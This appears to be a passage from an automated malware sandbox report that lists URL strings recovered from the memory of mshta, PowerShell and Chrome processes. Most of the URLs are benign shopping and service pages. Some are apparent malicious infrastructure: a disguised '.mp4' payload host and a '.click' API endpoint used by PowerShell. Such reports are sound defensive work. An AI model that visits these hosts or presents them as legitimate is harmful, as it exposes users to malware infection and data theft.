                    Source: powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56228034804.0000000008311000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56226345857.0000000008182000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56227747151.00000000082B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4
                    Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4)
                    Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56247007984.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249621751.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4...
                    Source: mshta.exe, 00000002.00000002.56251199450.0000000006C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4...I
                    Source: mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4C:
                    Source: powershell.exe, 00000003.00000002.56226820699.00000000081DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56228034804.0000000008311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4LMEM
                    Source: mshta.exe, 00000002.00000003.56235294341.000000000B079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4LMEMH
                    Source: mshta.exe, 00000002.00000002.56249149191.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4O#
                    Source: powershell.exe, 00000003.00000002.56226345857.0000000008182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4STEMWdtPWdtPWdtP
                    Source: mshta.exe, 00000002.00000003.56233772606.000000000317A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4TTC:
                    Source: mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56248897252.0000000003060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4WinSta0
                    Source: mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4Y
                    Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4ZA
                    Source: mshta.exe, 00000002.00000003.56243252442.0000000006E95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243177692.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243292644.0000000006E96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl6.mp4
                    Source: mshta.exe, 00000002.00000003.56241454903.0000000006E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl6.mp4$
                    Source: mshta.exe, 00000002.00000003.56243252442.0000000006E95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243177692.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56243292644.0000000006E96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl6.mp4https://savecoupons.shop/singl
                    Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4l
                    Source: mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4p
                    Source: powershell.exe, 00000003.00000002.56227747151.00000000082B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4pm1
                    Source: powershell.exe, 00000003.00000002.56226345857.0000000008192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4t%
                    Source: powershell.exe, 00000003.00000002.56226345857.0000000008192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4tory
                    Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/singl6.mp4ventindowsINetCookiesL
                    Source: chrome.exe, 00000009.00000002.57285582693.0000781C022A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285933561.0000781C02310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                    Source: chrome.exe, 00000009.00000002.57285487694.0000781C02288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293972178.0000781C03080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299904492.0000781C037C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
                    Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                    Source: chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
                    Source: chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.of
                    Source: chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.ofce
                    Source: chrome.exe, 00000009.00000002.57291415985.0000781C02C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.cm/?
                    Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com
                    Source: chrome.exe, 00000009.00000002.57289152036.0000781C02990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286804233.0000781C02448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295897762.0000781C03344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294691129.0000781C031A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0330C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295311582.0000781C0326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
                    Source: chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/signin-oidc
                    Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                    Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comp_
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
                    Source: chrome.exe, 00000009.00000002.57299754105.0000781C037A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                    Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                    Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
                    Source: chrome.exe, 00000009.00000002.57282750707.000078180006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/
                    Source: powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click//
                    Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/H
                    Source: powershell.exe, 00000008.00000002.57436196787.0000000004C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/api
                    Source: powershell.exe, 00000008.00000002.57431193652.0000000000670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/apier
                    Source: powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/hur
                    Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i
                    Source: chrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0330C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/
                    Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
                    Source: chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.htmll
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/
                    Source: chrome.exe, 00000009.00000002.57301057032.0000781C03A42000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226362545.0000781C037E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
                    Source: chrome.exe, 00000009.00000002.57301057032.0000781C03A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeime
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/
                    Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
                    Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/v
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
                    Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.do
                    Source: chrome.exe, 00000009.00000002.57289996632.0000781C02A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=58216995782927489&postID=5453638059923624242&blogspo
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
                    Source: chrome.exe, 00000009.00000002.57288458289.0000781C027A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
